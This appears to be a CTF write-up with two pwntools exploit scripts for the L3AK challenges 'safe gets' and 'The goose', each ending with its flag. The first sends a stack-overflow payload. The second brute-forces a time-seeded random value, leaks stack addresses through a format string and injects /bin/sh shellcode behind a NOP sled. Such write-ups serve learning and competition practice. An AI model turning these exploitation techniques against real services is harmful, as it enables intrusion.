dplastico

safe gets

Cool challenge

#!/usr/bin/env python3

from pwn import *

# Target binary; pwntools takes arch/bits/endianness from it via context.binary.
elf = ELF("./chall_patched")
context.binary = elf
# Debugger pane: tmux horizontal split (-h) of size 130 (-l).
context.terminal = ["tmux", "splitw", "-hl", "130"]
# context.log_level = "debug"  # uncomment to trace every send/recv
# gdb script handed to gdb.debug() by start() when the script is run with GDB.
gs = "\nb main\ncontinue\n"

def start():
    """Return a pwntools tube for the target.

    REMOTE selects the hosted instance; GDB runs the local binary under the
    debugger with ``gs`` as its script; otherwise a plain local process.
    """
    if args.REMOTE:
        return remote("34.45.81.67", 16002)
    launch = gdb.debug if args.GDB else process
    extra = {"gdbscript": gs} if args.GDB else {}
    return launch([elf.path], **extra)

r = start()  # module-level tube; rcu() and the send/recv helpers below close over it

def rcu(d1, d2=0):
    """Consume input up to and including ``d1`` on the global tube.

    When a second delimiter ``d2`` is given, keep reading up to it and return
    the bytes in between (both delimiters dropped); otherwise return None.
    """
    r.recvuntil(d1, drop=True)
    if not d2:
        return None
    return r.recvuntil(d2, drop=True)
def libcbase():
    """Log libc.address.

    NOTE(review): nothing in this script assigns ``libc``, so calling this
    raises NameError unless a caller defines it first (template leftover).
    """
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log a leaked integer as ``<name> = 0x...``."""
    return log.info(name + (" = %#x" % val))


def sa(delim, data):
    """Wait for ``delim`` on the global tube, then send ``data`` (no newline)."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Wait for ``delim`` on the global tube, then send ``line`` plus a newline."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send ``line`` plus a newline on the global tube."""
    return r.sendline(line)


def bc(value):
    """ASCII-encode ``str(value)``; used to send numbers as bytes."""
    return str(value).encode('ascii')


def demangle_base(value):
    """Shift ``value`` left by 12 bits (multiply by 0x1000)."""
    return value << 0xc


def remangle(heap_base, value):
    """XOR ``value`` with ``heap_base`` shifted right by 12 bits."""
    return (heap_base >> 0xc) ^ value

#========= exploit here ===================

def rstring(s: str) -> str:
    """Return ``s`` with its characters in reverse order."""
    return "".join(reversed(s))

# U+1F480 SKULL: a single code point that becomes 4 bytes once UTF-8 encoded,
# which matters for every len() below.
jaja = "💀"

# The payload is assembled as str, not bytes, so the p64 value is widened
# through latin-1; that is lossless here because all eight bytes of
# 0x6a12400000000000 are below 0x80.
payload = "A"*0x28
payload += (p64(0x6a12400000000000)).decode('latin1')
payload += "C"*0x10
payload += "\x00"*8
payload += jaja*0x40

# NOTE(review): len() counts code points; with 0x40 skulls the byte length on
# the wire (assuming pwntools UTF-8-encodes the str) is larger than this value.
print(len(payload))

# Duplicates the print above; one of the two can go.
log.info(f"payload len() = {len(payload)}")

# Sent reversed; the doubled parentheses are just a plain call.
sl((rstring(payload)))

#L3AK{6375_15_4pp4r3n7ly_n3v3r_54f3}

#========= interactive ====================
r.interactive()  # hand the session to the user

The goose

Very creative challenge :)

#!/usr/bin/env python3

from pwn import *
import time
import random

# Target binary; checksec=False skips the banner pwntools prints on load.
elf = ELF("./chall_patched", checksec=False)
context.binary = elf
# Debugger pane: tmux horizontal split (-h) taking 70 percent (-p).
context.terminal = ["tmux", "splitw", "-hp", "70"]
# context.log_level = "debug"  # uncomment to trace every send/recv
# gdb script for GDB runs: no breakpoints, just continue.
gs = "\ncontinue\n"

def start():
    """Return a pwntools tube for the target.

    REMOTE selects the hosted instance; GDB runs the local binary under the
    debugger with ``gs`` as its script; otherwise a plain local process.
    """
    argv = [elf.path]
    if args.REMOTE:
        return remote("34.45.81.67", 16004)
    if args.GDB:
        return gdb.debug(argv, gdbscript=gs)
    return process(argv)

#r = start()

def rcu(d1, d2=0):
    """Read past ``d1`` on the global tube (discarded).

    With ``d2`` given, additionally return the bytes between ``d1`` and
    ``d2`` (delimiters dropped). Without it, nothing is returned.
    """
    r.recvuntil(d1, drop=True)
    return r.recvuntil(d2, drop=True) if d2 else None
def libcbase():
    """Log libc.address.

    NOTE(review): this script never assigns ``libc``; calling the helper as-is
    raises NameError (it is an unused template helper here).
    """
    return log.info("libc base = %#x" % libc.address)


def logleak(name, val):
    """Log a leaked integer as ``<name> = 0x...``."""
    return log.info(name + (" = %#x" % val))


def sa(delim, data):
    """Wait for ``delim`` on the global tube ``r``, then send ``data``."""
    return r.sendafter(delim, data)


def sla(delim, line):
    """Wait for ``delim`` on the global tube ``r``, then send ``line`` + newline."""
    return r.sendlineafter(delim, line)


def sl(line):
    """Send ``line`` + newline on the global tube ``r``."""
    return r.sendline(line)


def bc(value):
    """ASCII bytes of ``str(value)``."""
    return str(value).encode('ascii')


def demangle_base(value):
    """``value`` shifted left by 12 bits."""
    return value << 0xc


def remangle(heap_base, value):
    """``value`` XORed with ``heap_base`` shifted right by 12 bits."""
    return (heap_base >> 0xc) ^ value

#========= exploit here ===================

# Retry loop: derive candidate honk counts from the local clock, try each one
# on a fresh connection, and stop at the first hit. There is no break; the only
# way out is exit(0) after a successful attempt.
while True:
    ts = int(time.time())  # current wall-clock second, local
    nhonks_list = []
    c = 0  # attempts made in this sweep, used only for logging
    # Seeds ts-40 .. ts+40 cover clock skew between this host and the server.
    # NOTE(review): presumes the service seeds Python's random with the epoch
    # second and draws randint(10, 100) the same way — not verifiable here.
    for delta in range(-40, 41):
        random.seed(ts + delta)
        nhonks = random.randint(10, 100)
        nhonks_list.append(nhonks)

    for nhonks in nhonks_list:
        r = start()  # reconnect for every attempt; the helpers use the global r
        #r.timeout = 1
        # NOTE(review): these two sends sit outside the try below, so an EOFError
        # raised here propagates and aborts the whole loop instead of moving
        # on to the next candidate.
        sla(b"> ",b"AAAAAAAA")
        sla(b"honks?", bc(nhonks))
        try:
            c += 1
            log.info(f"Try #{c}")
            res = r.recv(timeout=1)  # one read with a 1 s timeout
            # Any of these strings in the reply is taken to mean the guess matched.
            if b"wow" in res or b"what's your name again?" in res or b"leave to the world?" in res:
                log.success(f"Encontrado nhonks = {nhonks}")
                # 13 "%p" specifiers separated by "-"; the reply is parsed below.
                payload = b"%p-"*12
                payload += b"%p"
                sl(payload)
                # First value between "wow " and the first "-", parsed as hex.
                leak = int(rcu(b"wow ","-"),16)
                logleak(f"stack leak", leak)  # f-string without placeholders; a plain str would do
                # 0x178 bytes of filler, an address derived from the leak, a 0x20-byte
                # NOP run and pwntools' stock /bin/sh shellcode. 0x178 and +0x60 are
                # presumably tuned to this binary's stack layout.
                payload = b"A"*0x178
                payload += p64(leak+0x60) #to land in the stack
                payload += b"\x90"*0x20
                payload += asm(shellcraft.sh())
                sla(b"to the world?", payload)

                r.interactive()
                exit(0)
        except EOFError:
            r.close()  # connection dropped: treat as a miss and try the next candidate
            continue
        except Exception:
            # NOTE(review): every other error is swallowed without a trace; a
            # log.exception(...) here would make a parse failure on a real hit visible.
            r.close()

    time.sleep(1)  # let the clock advance before resampling the seed window
#========= interactive ====================
r.interactive()  # NOTE(review): unreachable — the `while True` above has no break and only ends via exit(0)
#L3AK{H0nk_m3_t0_th3_3nd_0f_l0v3}